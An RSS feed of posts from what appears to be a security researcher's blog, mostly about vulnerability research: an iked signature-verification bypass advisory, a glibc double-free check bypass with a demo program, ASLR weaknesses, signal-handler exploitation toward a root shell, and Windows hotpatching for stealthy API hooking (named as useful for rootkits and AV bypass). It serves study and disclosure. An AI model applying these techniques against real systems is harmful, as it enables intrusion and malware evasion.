<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>CVE-2011- iked(8) digital signature bypass vulnerability</title><description>2011-09-01 10:57:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus:

Improper API usage by iked(8) can result in silent digital signature validation.

Date reported: 26-Aug-2011
Date patched: 27-Aug-2011

Background: iked(8) is an Internet Key Exchange (IKEv2) daemon which performs mutual authentication and which establishes and maintains IPsec flows and security associations (SAs) between the two peers. The IKEv2 protocol is defined in RFC 5996, which combines and updates the previous standards: ISAKMP/Oakley (RFC 2408), IKE (RFC 2409), and the Internet DOI (RFC 2407).

Related vulnerabilities: CVE-2008-5077, CVE-2009-0021

Description: Under certain circumstances iked can be tricked into bypassing a signature verification, caused by the incorrect check of the EVP_VerifyFinal() return value.

Technical details:

ssize_t
dsa_verify_final(struct iked_dsa *dsa, void *buf, size_t len)
{
	u_int8_t	 sig[EVP_MAX_MD_SIZE];
	u_int		 siglen = sizeof(sig);

	if (dsa-&gt;dsa_hmac) {
		/* HMAC path: compare the computed MAC against the received one */
		HMAC_Final(dsa-&gt;dsa_ctx, sig, &amp;siglen);
		if (siglen != len || memcmp(buf, sig, siglen) != 0)
			return (-1);
	} else {
		/* public-key path; the comparison applied to the return value
		 * did not survive extraction of this post and is left blank */
		if (EVP_VerifyFinal(dsa-&gt;dsa_ctx, buf, len, dsa-&gt;dsa_key) ...) {
			ca_sslerror();
			return (-1);
		}
	}

	return (0);
}

As we review the code, we find that the dsa_verify_final() function is an abstraction wrapper around two different OpenSSL API calls, HMAC_Final() and EVP_VerifyFinal(), depending on contextual data supplied by the function's parameters. Of particular note is the call to EVP_VerifyFinal(), which upon reviewing the man pages and/or source code for the function we find actually has three types of return value, with two of the three indicating some form of failure:

RETURN VALUES
EVP_VerifyInit_ex() and EVP_VerifyUpdate() return 1 for success and 0 for failure. EVP_VerifyFinal() returns 1 for a correct signature, 0 for failure and -1 if some other error occurred.

A quick review of the OpenSSL source code (omitted here) shows that the man page indeed accurately reflects the API and that there are potentially user-controlled code paths that will cause -1 to be returned. Furthermore, a review of the relevant code path in iked shows that this code path is conditionally executed out of the main receive handler for the service.

Fix / Patch information: The OpenBSD team quickly provided a patch, inclusive of other potential but uninvestigated exposures, the day following this bug's reporting. Affected parties are recommended to update iked with the patch found at http://www.openbsd.org/cgi-bin/cvsweb/src/sbin/iked/crypto.c.diff?r1=1.15&amp;r2=1.16 or whichever is relevant to their installation. IOActive would like to thank mikeb of the OpenBSD team for his prompt and courteous interaction through the brief patching process.</description><link>http://www.secuobs.com/revue/news/326448.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/326448.shtml</guid></item>
<item><title>Champions of the free republic: Lemonade Liberation, 20-Aug-2011</title><description>Secuobs.com : 2011-08-24 10:53:34 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - Far too often the bravest among us remain faceless and forgotten, existing only officially as booking numbers and penal code violators. These people did more than just retweet, repost and blog; they sacrificed at least one night of their liberty for a cause. This forgetfulness on our parts is wrong and I hope to begin to rectify it. All of the following were arrested during a peaceful demonstration in Washington DC. My brief words could do their cause no justice and so I recommend the so inclined visit their facebook page: http://www.facebook.com/event.php?eid=169961886410145 (photos)</description><link>http://www.secuobs.com/revue/news/324893.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/324893.shtml</guid></item>
<item><title>Stop the pipeline, 20-Aug-2011</title><description>Secuobs.com : 2011-08-23 09:59:47 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - (photos) Far too often the bravest among us remain faceless and forgotten, existing only officially as booking numbers and penal code violators. These people did more than just retweet, repost and blog; they sacrificed at least one night of their liberty for a cause. This forgetfulness on our parts is wrong and I hope to begin to rectify it. All of the following were arrested during peaceful demonstrations in Washington DC. My brief words could do their cause no justice and so I recommend the so inclined visit their website at http://www.tarsandsaction.org (photos)</description><link>http://www.secuobs.com/revue/news/324611.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/324611.shtml</guid></item>
<item><title>Champions of the free republic: OpBART2 - 22-Aug-2011, SFO</title><description>Secuobs.com : 2011-08-23 08:20:39 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - Far too often the bravest among us remain faceless and forgotten, existing only officially as booking numbers and penal code violators. These people did more than just retweet, repost and blog; they sacrificed at least one night of their liberty for a cause. This forgetfulness on our parts is wrong and I hope to begin to rectify it. All of the following were arrested during peaceful demonstrations upholding both the citizens' rights to assembly &amp; speech, but also questioning the accountability of the BART police department's deployment of deadly force. With this entry, I hope to begin rectifying this and giving the heroes the proper attention they deserve. These men and women actually are fighting for your freedom. If you feel a particular person photographed should *not* be listed below, state your reasons and we'll see. If you're a photographed person, please contact me for removal from the pictures if that's your wish. (photos)</description><link>http://www.secuobs.com/revue/news/324598.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/324598.shtml</guid></item>
<item><title>greetings from the not so underground</title><description>Secuobs.com : 2011-08-12 04:40:20 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - "Although the legal and ethical definitions of right are the antithesis of each other, most writers use them as synonyms. They confuse power with goodness, and mistake law for justice." - Charles T. Sprading, Freedom and its Fundamentals

"It is not what a lawyer tells me I may do; but what humanity, reason, and justice tell me I ought to do." - Edmund Burke, Second Speech on Conciliation, 1775</description><link>http://www.secuobs.com/revue/news/322660.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/322660.shtml</guid></item>
<item><title>a couple random musings</title><description>Secuobs.com : 2010-09-17 01:58:31 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - Eh so, an ASLR update will come in the near future (waiting on a webserver to get setup for some image hosting). That all said, when I eventually get around to that post that will likely be the end of it, as dm557 had a bit on making system calls at the end of his XCon talk this year, so the cat is out of the bag so to speak. That all said, there are some interesting points to be made there-- specifically that randomization in several areas is more controllable than expected, which mostly just underscores the issues associated with randomization post-memory mapping (or rather not having ASLR built directly into the mmap functionality). Aside from that, a couple random notes because I'm avoiding report writing and this is what I do after I've watched several hours of TV, ate, washed clothes, et cetera.

0. I've recently had a business email setup for me that was deactivated like two years ago. The amusing part to me is that the 2nd day I had the account setup I received an email from someone wanting to know about the heap paper (or rather half-paper) I wrote up in 2007. Then today I received an email from a bugzilla for a bug I filed over two years ago also. It wasn't an important bug and the note from bugzilla was from a developer saying "I don't think anyone uses this module anymore". Status: Open -&gt; Closed. I can't complain, it was a useless bug that was filed by my pedantic doppelganger.

1. An interesting post by drraid (http://drraid.blogspot.com/2009/07/time-gcc-and-linker.html) that I had never really considered. I'm not sure what I would classify as the problem exactly: the missing prototype or the missing parameter. Going from memory the standards (I could be totally wrong here, I don't actually have them memorized) say that in absence of a prototype the default prototype is like int func(void), so what he's describing makes sense there, and while I haven't tested it, I imagine the compiler would error out given the prototype. However on the flipside, it would've worked fine in absence of the prototype had he passed a parameter. I'm naturally leaning towards the 'forgot the prototype' side of things, as at least it wouldn't compile in that case. This has me wondering how common it is to find such code constructs. I can't recall ever seeing anything like that, but the first time through his sample code I managed to miss that he wasn't passing a parameter, so I suppose I could've just missed it. My first gut impression says that it would be more likely in C++ (where default parameters are common), but type-checking is also a bit more stringent, so it may not allow those situations at all. My second gut impression is that it maybe happens a bit in MSFT APIs, as they like their optional output parameters, but everything I can immediately think of takes more than one parameter so it seems less likely someone would forget it. My third gut impression is that while interesting, this is probably not very common because it's going to require a series of mistakes. Nonetheless it represents an uncommon way for an application to die, which is always interesting.

Aside from that, I don't have much to say. I'm in Portland at the moment; the hotel is nice, but full of roaming mobs of young teenagers, which grates my nerves a bit. Okay, it's late, I've gotten maybe 50-75 lines of report written, that sounds like a productive Saturday. Sleep.</description><link>http://www.secuobs.com/revue/news/247865.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/247865.shtml</guid></item>
<item><title>(old blog repost) library randomization</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - UPDATE: no idea if this is accurate anymore. I doubt the ABI changed, but I have not once put my hands on, or operated on, wtfever Apple's new OS version is called; I don't really understand why anyone does.

04 November 2007, http://c9c3.blogspot.com/2007/11/library-randomization.html

library randomization

So it seems like to me, and perhaps I'm just not thinking right because I haven't worked it out on paper, but it seems like because of the fact that Apple says that:

"Mach-O position-independent code design is based on the observation that the __DATA segment is always located at a constant offset from the __TEXT segment. That is, the dynamic loader, when loading any Mach-O file, never moves a file's __TEXT segment relative to its __DATA segment. Therefore, a function can use its own current address plus a fixed offset to determine the location of the data it wishes to access. All segments of a Mach-O file, not only the __TEXT and __DATA segments, are at fixed offsets relative to the other segments. Note: If you are familiar with the Executable and Linking Format (ELF), you may note that Mach-O position-independent code is similar to the GOT (global offset table) scheme. The primary difference is that Mach-O code references data using a direct offset, while ELF indirects all data access through the global offset table."

Now, I haven't actually spent any time digging through Leopard, aside from a simple test of compiling a test program with the gcc on there (v4.0.1) to see if it had SSP (it had never heard of the flags -fstack-protector or -fstack-protector-all) - but it seems like if Apple PIC binaries contain this trait you end up with a couple complications. The first and most obvious would be that you can't randomize per section, although in theory I believe you should be able to randomize the stack and heap, although that may cause problems in one of those funko languages like Obj-C. The second problem is that because the text is not randomized, and because all I need to know is the base address of the image, which is pretty likely considering all of the segments that are not randomized, and then look for variable references that take observation of the fact that section offsets are constant, it would seem like I could reverse the address space layout that way. I mean examining the text or anything dealing with libraries, such as dyld, should reveal a lot of those references. It seems pretty much like overkill at this point in the game because all you really need is a jmp/call addr/reg, but honestly this seems like a deep flaw in the ASLR logic (maybe I just need more sleep).</description><link>http://www.secuobs.com/revue/news/213074.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213074.shtml</guid></item>
<item><title>(old blog repost) MAX_PATH and the secret life of backslash-backslash-questionmark-backslash</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - UPDATE: From experience (the type where specifics fall under NDAs), you can still find a lot of real bugs with this. It provides the 1 of a 1-2 hit against MSFT: error results in uninitialized buffer which gets used in condition X; the static/dynamic analysis tools don't catch it apparently. The 'Writing Secure Code' book from MSFT years ago only contained a single reference to MAX_PATH, which was in a path canonicalization function that made the mistake I reference below in the 2nd ed.; in the first edition, they omitted the return value checks all together. While browsing another book from MSFT on secure code, it contained zero references to it. The particular example in it I discussed a few years back with LeBlanc, who speaks about as well as he listens, who insisted it was a non-issue. He also vehemently denied writing the code; actually IIRC his first response was 'Howard wrote it', and if my memory further serves me correct I hadn't even said what code I was referring to yet. That said, it's been 2-3 years and it is entirely possible that I am misremembering whether I had identified what code I was speaking of. Furthermore, when a co-worker of mine at the time was also off to have some experience, I said something about this causing a huge number of bugs in [recent_version_os_code_review]. Some months later in a drunken conversation, he confirmed that I was totally right and this broke a lot of things. Since then, I have found this '1-2 punch' in reviews as recent as 2009, so I have no reason to believe this is going away anytime soon. That said, I know that in several very key areas the code was fixed before it ever saw the light of day, although I know at least one of the products basically died and I have no idea what code was shared between similar projects. I have not tried the example I give at the end of my original post since Windows Vista, but I would guess the result is probably still the same.

04 November 2007

MAX_PATH and the secret life of backslash-backslash-questionmark-backslash

So in Windows, specifically in the Shell API, there is the concept of MAX_PATH, which obviously is the maximum path, isn't it? Well no, actually, it isn't. If you prepend the string \\?\ to a path and call the unicode version of the function, you can access files and directories with names up to something like 32,000 wide characters. This can in turn lead to incorrect file access (which can result in a lot of problems), or for a host of API calls that take an output buffer and output buffer size parameter, a 'buffer is too small' return value which is larger than the original output buffer size. That is to say you should be calling the APIs in the following way:

DWORD siz = len;
DWORD retval = SomethingWithALongNameW(..., siz);

if (0 == retval)
	/* error */
if (retval &gt; siz)
	/* resize buffer or error */

But I'm seeing that in a lot of cases that's not how people are calling it; they're instead calling it closer to this:

if (0 == SomethingWithALongNameW(..., siz)) {
	/* error */
}

When you do that, you end up with a condition where the buffer being passed in as an output isn't initialized to any value, and the return value is not properly checked, and there is no way to truly know whether the value was initialized or not. The second half of the problem comes from the fact that a lot of those same API calls will truncate at MAX_PATH, potentially leading to conditions where files are accessed incorrectly. Think of this in the context of signing or verifying the signature of a file where the path length that gets truncated is not the one that gets employed, or the return value is there also improperly checked. Seriously, try this out: open Visual Studio and create a directory structure that's like C:\0\1\2\3\4\5\6, et cetera; create it longer than MAX_PATH, and then try to access it via say cmd.exe or even explorer.exe; try to delete it using either of those (well not cmd.exe, but you'll see why there). (ed. note to the lazy reader: everything breaks.)</description><link>http://www.secuobs.com/revue/news/213073.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213073.shtml</guid></item>
<item><title>(old blog repost) double free's</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - UPDATE: briefly read Chris Rohlf's blog the other day and noted that new security checks have been added in the fastbin path; I cannot recall atm what they were or if this is still accurate.

04 November 2007, http://c9c3.blogspot.com/2007/11/double-free.html

double free

So, while writing an exploit for a publicly known bug at work I stumbled across another one, a double free. Then I started looking into how exactly one exploits a double free, and it looked grim. The program has to survive a double free, meaning that it cannot crash. The default action for glibc is to print an error message such as "glibc detected *** double free or corruption (fasttop): 0x12345678 ***" and then call abort(), which terminates the program. So it looked like it was not exploitable, and just a DoS, so I looked at BSD libc and the libc from Solaris; neither of them appeared to be affected by double free's either. So I went back and looked in glibc's source code to determine what exactly it checks to detect a double free. (There are a couple different checks depending on type; I'm only covering one here because it is what pertains to my situation and the others are essentially the same with a few other easily bypassed checks.) So, glibc has the concept of fast bins, or arrays where it stores free chunks of memory under certain conditions, most importantly chunks that are less than 512 bytes in length. So I looked at the glibc code in malloc/malloc.c and find the following relevant section:

    fb = &amp;(av-&gt;fastbins[fastbin_index(size)]);
    /* Another simple check: make sure the top of the bin is not the
       record we are going to add (i.e., double free).  */
    if (__builtin_expect (*fb == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }

Here we have something interesting; let me explain the code first though. In the first line we take the variable 'fb' and make it point to the address of the element in the fast bin array for the size of the chunk in question. In other words, the fast bin array is sorted by size of chunks, and we are assigning the fb variable to the address of the index for the given size of our current chunk. Then we check to see if what that address points to (*fb) is the address of the current chunk being free'd (p); if so we've found the chunk being free'd in the list of free chunks and we have a double free situation (or linked list corruption). But what if... What if another chunk of the same size, and thus in the same fast bin, has been deallocated since the current chunk was free'd? For instance, what if we have:

ptr0 = malloc(siz);
ptr1 = malloc(siz);
/* presume both calls succeed */
free(ptr0);
free(ptr1);

Then the top entry in the list won't be ptr0, it will be ptr1, and (assuming no other chunks in that list have been deallocated) ptr0 will be the second entry on the linked list, and the check will succeed and we will be able to free the pointer again, not have abort() called, and potentially exploit the situation for our advantage.

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

/* Deliberately performs a double free: with no arguments the second
 * free(ptr0) is caught by the fasttop check; with an argument the
 * intervening free(ptr1) moves ptr0 off the top of the bin. */
int
main(int argc, char **argv)
{
	void *ptr0 = NULL;

	ptr0 = malloc((size_t)64);
	if (NULL == ptr0) {
		perror("malloc");
		return EXIT_FAILURE;
	}

	if (1 &lt; argc) {
		void *ptr1 = NULL;

		ptr1 = malloc((size_t)64);
		if (NULL == ptr1) {
			perror("malloc");
			return EXIT_FAILURE;
		}

		free(ptr0);
		free(ptr1);
		free(ptr0);
	} else {
		free(ptr0);
		free(ptr0);
	}

	return EXIT_SUCCESS;
}

I've got a bit more on the glibc heap implementation, some of which I thought myself clever for finding only to realize it's been documented in a recent paper, others which just are redundant to mention at this point.</description><link>http://www.secuobs.com/revue/news/213072.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213072.shtml</guid></item>
<item><title>(old blog post) __dso_handle / __cxa_finalize</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - 04 November 2007, http://c9c3.blogspot.com/2007/11/so-im-working-on-another-program-not.html

__dso_handle / __cxa_finalize

So, I'm working on another program, not the one dealing with authentication and such but the one related to email with the buggy signal handler. There have been some complications in getting a reliable exploit for it, so I backed up and thought maybe I could find something easier to exploit in the signal handler. I expected to perhaps be able to screw with OpenSSL in cleanup routines but there are none. However, the code base is quite ugly and shows all the style of a grad student who thinks they know what they're doing, and I decided to fix it to improve reliability. (FYI: spaces = bad, tabs = good; putting as many things as you can on a single line = bad, new lines = good, they come free with the computer.) In doing so I found another small bug that I am trying to determine if I can leverage. Basically there is a static array of signed chars that I have limited control over the index of; because it's signed I can provide a negative index, but I only have a single char for an index so I am limited to a max of -127 bytes before the array. In that, I can do nothing if where the index ends up doesn't have the value of 0x20, so I started digging through .data (where the compiler puts the array) and seeing what has or could have a value of 0x20 -127 bytes back, and I ran across a symbol named __dso_handle. Not sure of what it is, I dug into GCC a little bit and here's what I found. Basically, it's a symbol that deals with C++ destructors for static objects in shared libraries; the relevant code that uses it is in a function called __cxa_finalize() and is something like as follows:

void
__cxa_finalize (void *d)
{
	...
	if (!d)
		return;

	for (funcs = __exit_funcs; funcs; funcs = funcs-&gt;next)
	{
		...
		if (f-&gt;flavor == ef_cxa &amp;&amp; d == f-&gt;func.cxa.dso_handle)
			f-&gt;func.cxa.fn (f-&gt;func.cxa.arg);
		...
	}
	...
}

The argument 'd' is the __dso_handle for the shared object. Interestingly enough, if I could modify that then I would have the possibility of having another object's destructors called, causing any number of circumstances, most likely a double free. It's not incredibly useful in this instance because I am dealing with a program that won't have any C++ static object destructors, but it's interesting nonetheless and something I will keep in mind in the future. That's that, and that was today in my world. Good night.</description><link>http://www.secuobs.com/revue/news/213071.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213071.shtml</guid></item>
<item><title>(old blog post) solaris thread locking</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - This post has too much code that I'm simply not going through the hassle of properly formatting atm, so below is a link to the post. Basically, IIRC the issue was that the Solaris allocator locks a mutex whenever it does a task that modifies its internal state (smart); however they wrote a wrapper to the pthread lock function that is prototyped like void xyzfunc(), so any errors during the locking process were ignored. Furthermore, by default the lock allowed recursive locks for the same process, meaning something like a signal could cause a re-entry into like malloc() or free(). That's all from memory; a brief look at the code looks like all the function prototypes returned int, so maybe I missed including the function that masked the error, or maybe it's there and I just didn't see it in my 30 second check. http://c9c3.blogspot.com/2007/11/sololis.html</description><link>http://www.secuobs.com/revue/news/213070.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213070.shtml</guid></item>
<item><title>(old blog repost) interesting thought at least</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - 04 November 2007, http://c9c3.blogspot.com/2007/11/interesting-thought-at-least.html

interesting thought at least

It's actually pretty neat: you can potentially cause a SIGTERM to be sent to a remote process on Linux if you can cause it to consume large amounts of memory, which in turn can potentially cause a signal handler to be invoked, which can potentially happen at awkward and inopportune moments. Specifically, what I'm trying to accomplish in something that I'm working on is that it has a function they call to deinitialize the entire process and deallocate globally-scoped memory. Specifically it does things like tear down database connections and destroy their opaque datatypes, and other similar things along with actual calls to free(). So, the Linux OOM killer calls a function named badness() (no joke) that determines every process's likelihood of resource abuse to reclaim memory for the system. It's a pretty extreme goodbye, but the OS does this when absolutely necessary to reclaim memory. The badness is calculated by various factors, including its capability set (specifically CAP_SYS_ADMIN and CAP_SYS_RAWIO), how long the process has been running, how many children it has and of course how much memory it's consuming. Finally it takes a user-tunable number, and left shifts the badness number that many times. Supposedly a value of -17 in this /proc file can cause the OOM killer to not consider that process if it's a process leader. Furthermore, processes that are in the process of free'ing memory are not candidates. So now the stage is set: I have a signal handler that calls a function that is seriously not re-entrant, but I can't reach it via traditionally applicable signals (signals that can be sent remotely), i.e. SIGPIPE, SIGURG, et cetera. It can be reached via things like SIGHUP, SIGTERM, SIGINT. I can however cause a SIGTERM to be sent indirectly. All I need is a memory leak, the more of them the better. I need as much precision as I can get on triggering this: if I can get it to trigger at the same time this process is already calling that exit function, and I can use one of the pieces of code that more or less acts as a destructor to use a dangling pointer and write 4 bytes to say the actual destructors, when the process calls libc's exit() I may be able to cause it to call an atexit function, which I hopefully control, and if all of these conditions are met, I land at a root shell.</description><link>http://www.secuobs.com/revue/news/213069.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213069.shtml</guid></item>
<item><title>section from recent email about MSFT hotpatching</title><description>Secuobs.com : 2010-04-16 18:59:48 - Omnia praeclara tam difficilia quam rara sunt / Adventavit asinus pulcher et fortissimus - This is something I spoke to someone about today-- at some point (maybe) I'll get around to formatting it out of ctrl-c/ctrl-v'd from my email, but I thought maybe people would find it interesting.

re: hotpatching

So I'm not *exactly* sure how it works yet, it's another 1/2 done project of mine. Like all of the MSFT binaries these days have procedure prologues (example assuming using frame ptr) like:

mov edx, edx
push ebp
mov ebp, esp
...

The mov edx, edx is there so you can have a positional relative jmp backward 4 bytes to the space directly prior to the function's entry point, i.e. the entire prologue (example again assuming using frame ptr) is more accurately like this:

nop
nop
nop
nop
mov edx, edx
push ebp
...

So. The idea is, for them to apply hotpatches they overwrite the mov edx,edx with the negative pos relative jmp, then use a full long jmp where the nops are and thus redirect function entry to the new patched version. I looked into this as I was in the process of reversing something that was pretty damn anti-reversing and I realized that even though they checksum/hash their code, they couldn't do the same to MSFT provided code without potentially breaking things, so I wanted to use the hotpatching stuff to hijack/monitor functions (the MSFT Detours stuff works on this same concept except they add new sections to the binary as trampolines or similar, and I didn't feel that adding new sections would be an effective method for getting around their anti-reversing). So of course I tried the first thing that crossed my mind, making ntdll writeable, modifying it and taking advantage of the fact that it wouldn't get unmapped when my process died. I, of course, hit the copy-on-write semantics of Windows and that's kind of as far as I got, as I got distracted and had to work on something else. However, the best I could tell by walking through NTDLL et cetera and thinking about how MSFT itself avoids the CoW behavior, there appears to be a system call that says 'hey hotpatch this for me'. It's totally undocumented and I'd have to dig around a bit to find the name of the system call again, but I can't see a reason why you couldn't start process A, make the system call or whatever and modify system DLLs that *won't* get unmapped (k32, ntdll, winsock, et cetera), to hook functions, exit your process and now you've hooked system APIs entirely in memory with no references on disk (except maybe swap), not registry/LD_PRELOAD type stuff, et cetera-- and the nice part is, if you're doing anti-reversing stuff you can't ever really determine if the patched API is the result of a MSFT patch or not (I think anyways-- digital signatures if present could cause a problem I suppose) or someone hooking stuff. In other words, once I get it figured out, not only is it a neat anti-anti-reversing technique, but that's pretty damn useful for things like rootkits, AV bypasses, et cetera.</description><link>http://www.secuobs.com/revue/news/213068.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213068.shtml</guid></item>
<item><title>temporary notification</title><description>Secuobs.com : 2010-04-16 18:59:48 - I'm in the process of copying crap from old blogs, emails, twitter spam of mine, and some newer stuff from the last few days and putting them out in the public. Any portions of conversations reposted contain only excerpts from what I said, and I don't disclose whom I was speaking to generally; they can feel free to identify themselves if there is a question. Also, while everything here is about computers atm, I intend to use this for longer crap that I shouldn't be putting on Twitter with 2321342143213 tweets. That said, I'm in a bit of a rush and only one new thing is up here, although I have some interesting other stuff to post when I get off my rear and go back to the painstaking process of copy/paste/remove site-whatever formatting/reformat/HTML-ize/post. Twitter, I hate you because copying more than a few PMs at a time seems to be a major pain in the ass.</description><link>http://www.secuobs.com/revue/news/213067.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213067.shtml</guid></item>
<item><title>(old blog post) threads and the STL</title><description>Secuobs.com : 2010-04-16 18:59:48 - UPDATE: no idea if this info is current; people have to pay me to murder my eyes by reading STL code.

threads and the STL
Oct 16th, 2007, 09:13 pm

While auditing this application I noticed that there was a linked list (std::list) that was accessed in multiple threads; insertion and deletion of nodes in the list was serialized, however iterating over the list was not, and my little wheels got turning. Here is the situation, essentially, in code below. I removed a bunch of layers of abstraction, but this is basically what it did:

    /* thread 0 */
    lock();
    list_x->push_back(new_node);
    unlock();

    /* thread 1 */
    for (itr = list_x->begin(); itr != list_x->end(); itr++)
        if (itr->method()) ...

In thread zero, what specifically happens behind the scenes is that the push_back() method first allocates a new node, then hooks the new node into the list, first by modifying the list's pointers, and then by modifying the node's pointers, at which point the new node is linked in and in a stable state. In the second thread, the variable itr is assigned the first node in the list, or more specifically list_x->next. In the middle condition of the for() statement, the iterator is checked to ensure that it does not equal the end of the list, which behind the scenes is actually defined as being list_x (the list is circular). Assuming this condition is true, the iterator is dereferenced and a member method is called. However, if in the process of hooking in the new node during push_back() this new node is traversed by the for() loop in the second thread, it is possible that itr->next does not point to a valid node in the list, and not to the node returned by end(). Thus when the iterator is assigned itr->next, it can point to an invalid section of memory, and then when the member method is called, execution can occur in an unintended spot.</description><link>http://www.secuobs.com/revue/news/213066.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213066.shtml</guid></item>
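<![CDATA[
The window described above, made concrete as an added example. This is editor-supplied C++, not the post's code and not any real STL implementation: a miniature circular list whose push_back is split into the two steps the post names (hook the list's pointers, then write the node's pointers), plus the locked version. POISON is a stand-in for the garbage a freshly allocated node holds, so walk() can report the point where the real loop would dereference it instead of crashing.

```cpp
#include <cstdint>
#include <cstdio>
#include <mutex>

// Added example, not from the original post. A circular doubly-linked list
// laid out like std::list: the header node doubles as end(). push_back is
// done in two explicit steps so the unlocked iterator can be run in between.

struct Node {
    Node* next;
    Node* prev;
    int   value;
};

// Stands in for the uninitialised bytes a new node holds before its links
// are written; a real list would contain whatever the allocator left there.
static Node* const POISON =
    reinterpret_cast<Node*>(static_cast<std::uintptr_t>(0xDEADBEEF));

struct List {
    Node head;   // sentinel: begin() is head.next, end() is &head
    List() { head.next = &head; head.prev = &head; head.value = 0; }
    ~List() {
        Node* it = head.next;
        while (it != &head) { Node* nx = it->next; delete it; it = nx; }
    }
    Node* begin() { return head.next; }
    Node* end()   { return &head; }
};

struct PendingInsert { Node* node; Node* old_tail; };

// Step 1: the list side is hooked. From here until step 2 completes, an
// iterator that reads old_tail->next obtains `node`, whose own links are
// still garbage.
PendingInsert push_back_step1(List& l, int v)
{
    Node* n = new Node{POISON, POISON, v};
    Node* old_tail = l.head.prev;
    old_tail->next = n;
    l.head.prev = n;
    return PendingInsert{n, old_tail};
}

// Step 2: the node's own links are written and the list is consistent again.
void push_back_step2(List& l, const PendingInsert& p)
{
    p.node->prev = p.old_tail;
    p.node->next = &l.head;
}

// Thread 1 from the post: for (itr = begin(); itr != end(); itr = itr->next).
// Returns the number of nodes visited, or -1 where the real loop would
// dereference garbage (a crash, or a call through whatever the bytes hold).
int walk(List& l)
{
    int seen = 0;
    for (Node* it = l.begin(); it != l.end(); it = it->next) {
        if (it == POISON) return -1;
        ++seen;
    }
    return seen;
}

// The fix: iteration has to take the same lock as insertion and deletion.
class GuardedList {
public:
    void push_back(int v) {
        std::lock_guard<std::mutex> g(m_);
        push_back_step2(list_, push_back_step1(list_, v));
    }
    int walk_locked() {
        std::lock_guard<std::mutex> g(m_);
        return walk(list_);
    }
private:
    std::mutex m_;
    List list_;
};

// The iterator runs inside the window between the two steps.
int demo_race_window()
{
    List l;
    for (int i = 0; i < 3; ++i) push_back_step2(l, push_back_step1(l, i));
    PendingInsert p = push_back_step1(l, 3);   // thread 0 is mid-push_back
    int r = walk(l);                           // thread 1 iterates now
    push_back_step2(l, p);                     // finish so the list frees cleanly
    return r;                                  // -1
}

// The same iteration once push_back has completed, or under the lock.
int demo_consistent()
{
    GuardedList g;
    for (int i = 0; i < 4; ++i) g.push_back(i);
    return g.walk_locked();                    // 4
}

int main()
{
    std::printf("unlocked walk during push_back: %d\n", demo_race_window());
    std::printf("locked walk after push_back:    %d\n", demo_consistent());
    return 0;
}
```

demo_race_window() returns -1: the iterator passes the end check (the half-linked node is not the header), reaches the new node, reads its unwritten next pointer and would call a method through it. Serializing only insert and delete does not help, because the reader observes the intermediate state; the reader must hold the same mutex, as GuardedList does (a reader/writer lock, or a copy of the list taken under the lock and iterated outside it, are the usual cheaper variants).
]]>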
<item><title>(old blog post) find the bug</title><description>Secuobs.com : 2010-04-16 18:59:48 - This is an old "find the bug" I typed up years ago. I'm not sure when I first posted it; I cannot seem to find the original link in Google, although I'm a little creeped out by what I did find (who the hell is animalgloom?). At any rate, your first impulsive answer is probably not the correct one.

<![CDATA[
/* CComBSTR lives in atlbase.h; the other headers cover cout, EXIT_* and wcscmp */
#include <atlbase.h>
#include <iostream>
#include <cstdlib>
#include <cwchar>

class doh_t
{
    public:
        LPCWSTR getter()
        {
            return m_str ? m_str : L"";
        }
    private:
        CComBSTR m_str;
};

int
main(void)
{
    LPCWSTR locStr;
    doh_t   doh;

    locStr = doh.getter();

    if (NULL != locStr) {
        if (!wcscmp(locStr, L"")) {
            std::cout << "blank stringz" << std::endl;
            return EXIT_FAILURE;
        } else { /* XXX not reached */
            std::cout << "doh.getter(): " << locStr << std::endl;
            return EXIT_SUCCESS;
        }
    } else {
        std::cout << "doh.getter() returned null" << std::endl;
        return EXIT_FAILURE;
    }

    /* XXX not reached */
    return EXIT_FAILURE;
}
]]></description><link>http://www.secuobs.com/revue/news/213065.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213065.shtml</guid></item>
